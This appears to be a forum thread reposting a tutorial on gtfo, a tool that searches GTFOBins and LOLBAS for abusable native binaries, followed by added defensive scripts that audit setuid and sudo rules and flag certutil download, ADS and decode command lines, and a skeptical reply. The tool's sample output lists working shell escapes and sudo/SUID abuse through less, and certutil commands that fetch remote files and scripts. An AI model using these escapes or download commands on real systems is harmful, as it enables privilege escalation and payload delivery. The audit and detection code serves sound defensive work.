Kev Posted October 11, 2020

GTFOBins and LOLBAS are projects with the goal of documenting native binaries that can be abused and exploited by attackers on Unix and Windows systems, respectively. These binaries are often used for "living off the land" techniques during post-exploitation. In this tutorial, we will be exploring gtfo, a tool used to search these projects for abusable binaries right from the command line.

What Is Living Off the Land?

Living off the land is a method used by attackers that utilizes existing tools and features in the target environment to further the attack. Goals can include privilege escalation, lateral movement, persistence, data exfiltration, spawning reverse shells, and more.

This technique is great at flying under the radar and can be difficult for defenders to detect. Since many of these tools are used for legitimate administration, it can be hard to separate malicious activity from normal activity. Windows PowerShell is a good example: despite being abused by attackers for years, it is still a common vector during post-exploitation.

Another compelling reason that malicious actors prefer native binaries is cost. In general, it is much more expensive and risky to develop custom tools, which are more likely to be flagged to begin with. Especially when living-off-the-land techniques can become wormable, it's in an attacker's best interest to use what is already there.

GTFOBins and LOLBAS are no doubt excellent resources when it comes to abusing native binaries, but sometimes it can be tedious to switch back and forth from the browser. Gtfo is a tool written in Python that aims to provide all the information these resources have to offer from the convenience of the terminal.

Installing Gtfo

To install gtfo, the first thing we need to do is clone the GitHub repository:

    ~# git clone https://github.com/mzfr/gtfo
    Cloning into 'gtfo'...
    remote: Enumerating objects: 56, done.
    remote: Counting objects: 100% (56/56), done.
    remote: Compressing objects: 100% (42/42), done.
    remote: Total 56 (delta 21), reused 42 (delta 12), pack-reused 0
    Unpacking objects: 100% (56/56), 317.52 KiB | 1.65 MiB/s, done.

Next, change into the newly created directory:

    ~# cd gtfo

Gtfo uses Python 3, so we need pip3 here. It can be installed with the following command:

    ~/gtfo# apt install python3-pip

Now we can install the required dependencies:

    ~/gtfo# pip3 install -r requirements.txt
    Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (5.3.1)
    Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.23.0)
    Collecting bs4
      Downloading bs4-0.0.1.tar.gz (1.1 kB)
    Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (4.5.2)
    Collecting requests_cache
      Downloading requests_cache-0.5.2-py2.py3-none-any.whl (22 kB)
    Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (0.8.2)
    Requirement already satisfied: pyfiglet in /usr/lib/python3/dist-packages (from -r requirements.txt (line 7)) (0.8.post0)
    Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4->-r requirements.txt (line 3)) (4.9.1)
    Building wheels for collected packages: bs4
      Building wheel for bs4 (setup.py) ... done
      Created wheel for bs4: filename=bs4-0.0.1-py3-none-any.whl size=1272 sha256=2a0036256cc5bc7b34622abe1b56ff080f2829a0ae7cc2c858b079e0c9172e71
      Stored in directory: /root/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca
    Successfully built bs4
    Installing collected packages: bs4, requests-cache
    Successfully installed bs4-0.0.1 requests-cache-0.5.2

Now we can run gtfo with the dot-slash command:

    ~/gtfo# ./gtfo
    [ gtfo ASCII-art banner ]
    usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})
    gtfo: error: one of the arguments -b/--bins -e/--exe -w/--link -ls/--list is required

This gives us some short usage information. We should be able to run this tool from anywhere on our system by creating a symbolic link to the executable. Navigate to /usr/local/bin to get started:

    ~/gtfo# cd /usr/local/bin/

And create a symbolic link called gtfo to the executable in the directory we cloned from GitHub earlier (adjust the target path if you cloned the repository somewhere else):

    ~/usr/local/bin# ln -s ~/NB/gtfo/gtfo gtfo

Now we can run gtfo from any directory.
Using Gtfo to Search Binaries

To view the help menu and optional arguments, use the -h flag:

    ~# gtfo -h
    [ gtfo ASCII-art banner ]
    usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})

    optional arguments:
      -h, --help            show this help message and exit
      -b BINS, --bins BINS  Search binaries on GTFOBins
      -e EXE, --exe EXE     Search Windows exe on LOLBAS
      -w LINK, --link LINK  gtfobins link to the page
      -ls {bins,exe}, --list {bins,exe}
                            list all the available binaries

We can list the Unix binaries with the -ls switch followed by the bins argument:

    ~# gtfo -ls bins
    [ gtfo ASCII-art banner ]
    apt-get      apt        aria2c     arp         ash        awk           base32       base64    bash               bpftrace
    bundler      busctl     busybox    byebug      cancel     cat           chmod        chown     chroot             cobc
    cp           cpan       cpulimit   crash       crontab    csh           curl         cut       dash               date
    dd           dialog     diff       dmesg       dmsetup    dnf           docker       dpkg      easy_install       eb
    ed           emacs      env        eqn         expand     expect        facter       file      find               finger
    flock        fmt        fold       ftp         gawk       gcc           gdb          gem       genisoimage        gimp
    git          grep       gtester    hd          head       hexdump       highlight    iconv     iftop              ionice
    ip           irb        jjs        journalctl  jq         jrunscript    ksh          ksshell   ld.so              ldconfig
    less         logsave    look       ltrace      lua        lwp-download  lwp-request  mail      make               man
    mawk         more       mount      mtr         mv         mysql         nano         nawk      nc                 nice
    nl           nmap       node       nohup       nroff      nsenter       od           openssl   pdb                perl
    pg           php        pic        pico        pip        pkexec        pry          puppet    python             rake
    readelf      red        redcarpet  restic      rlogin     rlwrap        rpm          rpmquery  rsync              ruby
    run-mailcap  run-parts  rview      rvim        scp        screen        script       sed       service            setarch
    sftp         shuf       smbclient  socat       soelim     sort          sqlite3      ssh       start-stop-daemon  stdbuf
    strace       strings    su         sysctl      systemctl  tac           tail         tar       taskset            tclsh
    tcpdump      tee        telnet     tftp        time       timeout       tmux         top       ul                 unexpand
    uniq         unshare    uudecode   uuencode    valgrind   vi            view         vim       watch              wget
    whois        wish       xargs      xxd         xz         yelp          yum          zip       zsh                zsoelim
    zypper

This outputs a nice table containing all the abusable binaries that can be found on GTFOBins.
To list Windows binaries, use the -ls switch followed by the exe argument:

    ~# gtfo -ls exe
    [ gtfo ASCII-art banner ]
    At.exe             Atbroker.exe          Bash.exe                         Bitsadmin.exe                 CertReq.exe            Certutil.exe            Cmd.exe
    Cmdkey.exe         Cmstp.exe             Control.exe                      Csc.exe                       Cscript.exe            Desktopimgdownldr.exe   Dfsvc.exe
    Diantz.exe         Diskshadow.exe        Dnscmd.exe                       Esentutl.exe                  Eventvwr.exe           Expand.exe
    Extexport.exe      Extrac32.exe          Findstr.exe                      Forfiles.exe                  Ftp.exe                GfxDownloadWrapper.exe  Gpscript.exe
    Hh.exe             Ie4uinit.exe          Ieexec.exe                       Ilasm.exe                     Infdefaultinstall.exe  Installutil.exe         Jsc.exe
    Makecab.exe        Mavinject.exe         Microsoft.Workflow.Compiler.exe  Mmc.exe                       MpCmdRun.exe           Msbuild.exe             Msconfig.exe
    Msdt.exe           Mshta.exe             Msiexec.exe                      Netsh.exe                     Odbcconf.exe           Pcalua.exe              Pcwrun.exe
    Pktmon.exe         Presentationhost.exe  Print.exe                        Psr.exe                       Rasautou.exe           Reg.exe                 Regasm.exe
    Regedit.exe        Regini.exe            Register-cimprovider.exe         Regsvcs.exe                   Regsvr32.exe           Replace.exe             Rpcping.exe
    Rundll32.exe       Runonce.exe           Runscripthelper.exe              Sc.exe                        Schtasks.exe           Scriptrunner.exe        SyncAppvPublishingServer.exe
    Ttdinject.exe      Tttracer.exe          vbc.exe                          Verclsid.exe                  Wab.exe                Wmic.exe                Wscript.exe
    Wsreset.exe        Xwizard.exe           Advpack.dll                      Comsvcs.dll                   Ieadvpack.dll          Ieaframe.dll            Mshtml.dll
    Pcwutl.dll         Setupapi.dll          Shdocvw.dll                      Shell32.dll                   Syssetup.dll           Url.dll                 Zipfldr.dll
    AgentExecutor.exe  Appvlp.exe            Bginfo.exe                       Cdb.exe                       csi.exe                Devtoolslauncher.exe    dnx.exe
    Dotnet.exe         Dxcap.exe             Excel.exe                        Mftrace.exe                   Msdeploy.exe           msxsl.exe               ntdsutil.exe
    Powerpnt.exe       rcsi.exe              Sqldumper.exe                    Sqlps.exe                     SQLToolsPS.exe         Squirrel.exe            te.exe
    Tracker.exe        Update.exe            vsjitdebugger.exe                Winword.exe                   Wsl.exe                CL_Mutexverifiers.ps1   CL_Invocation.ps1
    Manage-bde.wsf     Pubprn.vbs            Slmgr.vbs                        Syncappvpublishingserver.vbs  winrm.vbs              Pester.bat

This outputs a table containing all the abusable binaries that can be found on LOLBAS.

To get information about a specific binary, use the -b flag.
Here we can see information about the Unix less command:

    ~# gtfo -b less
    [ gtfo ASCII-art banner ]
    Code: less /etc/profile
    !/bin/sh
    Type: shell

    Code: VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
    v
    Type: shell

    Code: less file_to_read
    Type: file-read

    # This is useful when `less` is used as a pager by another binary to read a different file.
    Code: less /etc/profile
    :e file_to_read
    Type: file-read

    Code: echo DATA | less
    sfile_to_write
    q
    Type: file-write

    # This invokes the default editor to edit the file. The file must exist.
    Code: less file_to_write
    v
    Type: file-write

    Code: sudo less /etc/profile
    !/bin/sh
    Type: sudo

    Code: ./less file_to_read
    Type: suid

In the output, we can see the type of abuse and the corresponding code. This example contains code for sudo and SUID, to get a shell, and to read and write files.

We can also get the link to the GTFOBins page with the -w option:

    ~# gtfo -w less
    [ gtfo ASCII-art banner ]
    --> less --------------------> https://gtfobins.github.io//gtfobins/less

To view information on a particular Windows binary, use the -e flag. Please note this is case sensitive and the extension is required. Here, we can see information about the Certutil.exe program:

    ~# gtfo -e Certutil.exe
    [ gtfo ASCII-art banner ]
    # Download and save 7zip to disk in the current folder.
    CMD: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    Category: Download
    Privileges: User

    # Download and save 7zip to disk in the current folder.
    CMD: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    Category: Download
    Privileges: User

    # Download and save a PS1 file to an Alternate Data Stream (ADS).
    CMD: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
    Category: ADS
    Privileges: User

    # Command to encode a file using Base64
    CMD: certutil -encode inputFileName encodedOutputFileName
    Category: Encode
    Privileges: User

    # Command to decode a Base64 encoded file.
    CMD: certutil -decode encodedInputFileName decodedOutputFileName
    Category: Decode
    Privileges: User

We can see the category, command, and required privileges in the output. This example contains commands to encode, decode, and download files.

We can also get the link to the LOLBAS page with the -w option:

    ~# gtfo -w Certutil.exe
    [ gtfo ASCII-art banner ]
    --> Certutil.exe --------------------> https://lolbas-project.github.io//lolbas/Binaries/Certutil

Wrapping Up

This tutorial taught us about the GTFOBins and LOLBAS projects and how incredibly useful they can be for information on native binaries on Unix and Windows systems. We also explored gtfo, a tool that can search these resources right from the command line. As you can see, gtfo can be quite useful for searching abusable binaries without ever having to leave the terminal.

Source
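The same GTFOBins data that gtfo prints for `less` is most useful to a defender as an audit list: every setuid binary and every sudo rule on a host can be checked against the function types (sudo, suid, shell, file-read, file-write) the project documents. The script below is an added example and is not part of the gtfo project or the tutorial above. It embeds a constructed, minimal mirror of GTFOBins data (only the type names, no exploit code), a constructed `ls -l` style listing of setuid files, and constructed sudoers lines, and reports which of them are reachable through a documented function. The `parse_sudoers` regex handles the common `user HOST=(runas) [NOPASSWD:] cmd, cmd` shape only; it is an assumption of this example, not a full sudoers parser.

```python
"""Audit setuid files and sudo rules against GTFOBins-style function types.

Added example; GTFOBINS, SUID_LISTING and SUDOERS are all constructed sample
data, not output captured from a real host or from the GTFOBins project.
"""
import os
import re

# Constructed subset of GTFOBins data: binary name -> documented function types.
GTFOBINS = {
    "less": {"shell", "file-read", "file-write", "sudo", "suid"},
    "vim": {"shell", "file-read", "file-write", "sudo", "suid"},
    "cat": {"file-read", "sudo", "suid"},
    "ls": set(),  # constructed: a binary with no documented escape
}

# Constructed output of: find / -perm -4000 -type f -exec ls -l {} \;
SUID_LISTING = """\
-rwsr-xr-x 1 root root 149080 Jan 10 2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 180000 Mar  1 2020 /usr/bin/less
-rwsr-xr-x 1 root root  44000 Mar  1 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root  35000 Mar  1 2020 /bin/cat
"""

# Constructed sudoers lines in the format sudo itself uses.
SUDOERS = """\
# constructed sample
root    ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD: /usr/bin/vim, /usr/bin/systemctl restart app
backup  ALL=(root) /bin/cat /var/log/*
"""


def parse_suid_listing(text):
    """Return the paths in an `ls -l` style listing whose mode carries the setuid bit."""
    paths = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 9:
            continue
        mode, path = parts[0], parts[-1]
        # The owner-execute slot shows 's' (or 'S' without exec) when setuid is set.
        if len(mode) == 10 and mode[3] in "sS":
            paths.append(path)
    return paths


# user HOST=(runas) [TAG: ...] cmd[, cmd ...]   (assumed simplified sudoers grammar)
SUDOERS_RE = re.compile(
    r"^(\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return (user, command_path_or_ALL, nopasswd) for each command in sudoers lines."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        user = m.group(1)
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            # Keep only the executable; arguments do not change which binary runs.
            out.append((user, "ALL" if cmd == "ALL" else cmd.split()[0], nopasswd))
    return out


def audit(suid_text=SUID_LISTING, sudoers_text=SUDOERS, db=GTFOBINS):
    """Report setuid files and sudo rules that match a documented GTFOBins function.

    Each finding is (source, subject, binary, sorted_types): source is 'suid' for
    setuid files, 'sudo' or 'sudo:nopasswd' for sudo rules.
    """
    findings = []
    for path in parse_suid_listing(suid_text):
        name = os.path.basename(path)
        types = db.get(name, set())
        if "suid" in types:
            findings.append(("suid", path, name, sorted(types)))
    for user, cmd, nopasswd in parse_sudoers(sudoers_text):
        if cmd == "ALL":
            continue  # unrestricted sudo is a separate finding; GTFOBins adds nothing
        name = os.path.basename(cmd)
        types = db.get(name, set())
        if "sudo" in types:
            src = "sudo:nopasswd" if nopasswd else "sudo"
            findings.append((src, user, name, sorted(types)))
    return findings


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

On the constructed input this reports the setuid `less` and `cat` and the sudo rules granting `vim` (without a password) and `cat`; `sudo`, `passwd` and `systemctl` are not flagged because the constructed data set documents nothing for them. In a real audit the data set would be the full GTFOBins list from the page above, and every hit is a candidate for removing the setuid bit, narrowing the sudo rule, or replacing the pager/editor with one that cannot spawn a shell.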
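The Certutil.exe entry above also doubles as a detection spec: the Download, ADS, Encode and Decode categories map directly onto command-line switches that a process-creation log will show. The following is an added example, not code from the gtfo or LOLBAS projects; it classifies constructed process-creation records (a simplified `timestamp|user|image|command_line` form, not a real Sysmon or 4688 layout) using those categories, and keeps a benign `-hashfile` invocation in the sample so the rules are seen to ignore ordinary use. The ADS pattern assumes the `drive:\path:stream` form shown in the entry.

```python
"""Classify certutil command lines by LOLBAS category (Download, ADS, Encode, Decode).

Added example; LOG is constructed sample data and the record format is an
assumption of this example, not a real event-log schema.
"""
import re

# Constructed process-creation records: timestamp|user|image|command_line
LOG = r"""
2020-10-11T10:01:02Z|CORP\alice|certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/tool.exe tool.exe
2020-10-11T10:02:15Z|CORP\bob|certutil.exe|certutil -decode payload.b64 payload.exe
2020-10-11T10:03:40Z|NT AUTHORITY\SYSTEM|certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/x.ps1 c:\temp:ttt
2020-10-11T10:04:00Z|CORP\carol|certutil.exe|certutil -verifyctl -f -split http://example.invalid/a.exe a.exe
2020-10-11T10:05:00Z|CORP\dave|certutil.exe|certutil -hashfile installer.msi SHA256
2020-10-11T10:06:00Z|CORP\erin|cmd.exe|cmd.exe /c dir
"""

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# drive:\path:stream  (alternate data stream target, as in the LOLBAS entry)
ADS_RE = re.compile(r"\b[a-z]:\\[^\s:]*:[^\s\\]+", re.IGNORECASE)
CERTUTIL_NAMES = ("certutil", "certutil.exe")


def classify(cmdline):
    """Return the sorted LOLBAS categories a certutil command line falls into ([] if none)."""
    tokens = cmdline.lower().split()
    if not tokens:
        return []
    # Strip any directory (Windows or POSIX separators) from the image token.
    image = re.split(r"[\\/]", tokens[0])[-1]
    if image not in CERTUTIL_NAMES:
        return []
    # certutil accepts both '-' and '/' switch prefixes.
    flags = {t.lstrip("-/") for t in tokens[1:] if t[0] in "-/"}
    cats = set()
    if ({"urlcache", "verifyctl"} & flags) and URL_RE.search(cmdline):
        cats.add("Download")
        if ADS_RE.search(cmdline):
            cats.add("ADS")  # download written into an alternate data stream
    if "encode" in flags:
        cats.add("Encode")
    if "decode" in flags:
        cats.add("Decode")
    return sorted(cats)


def scan(log_text=LOG):
    """Return (timestamp, user, categories) for every record that matches a category."""
    hits = []
    for line in log_text.strip().splitlines():
        ts, user, _image, cmdline = line.split("|", 3)
        cats = classify(cmdline)
        if cats:
            hits.append((ts, user, cats))
    return hits


if __name__ == "__main__":
    for hit in scan():
        print(hit)
```

A match is a lead, not a verdict: `-decode` is also used legitimately, so a real rule would add context (parent process, whether the decoded file is later executed, the download host). The reason this works at all is the point Nytro makes below in stronger words: the binary is trusted, but its command line is fully visible, and that is what the detection keys on.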
Nytro Posted October 11, 2020

Am I the only one for whom all of this is just useless junk? With extremely few exceptions, these could be of very little use. Otherwise, I see no value in something like this and I don't understand why people get so worked up when it comes up.

PS: Out of curiosity I asked an experienced person about the usefulness of these "things", someone who was in a way "promoting" them, and they did not convince me at all that there is any advantage.

PS: I know everyone says that this way you can bypass AV or EDR. If there is any AV or EDR so retarded that you can use certutil to download a detectable binary and execute it, and it doesn't catch on just because it was run by certutil, then those pieces of junk are not AV or EDR; they should be uninstalled instantly and an email full of homegrown swear words sent to the garbage collectors who made them.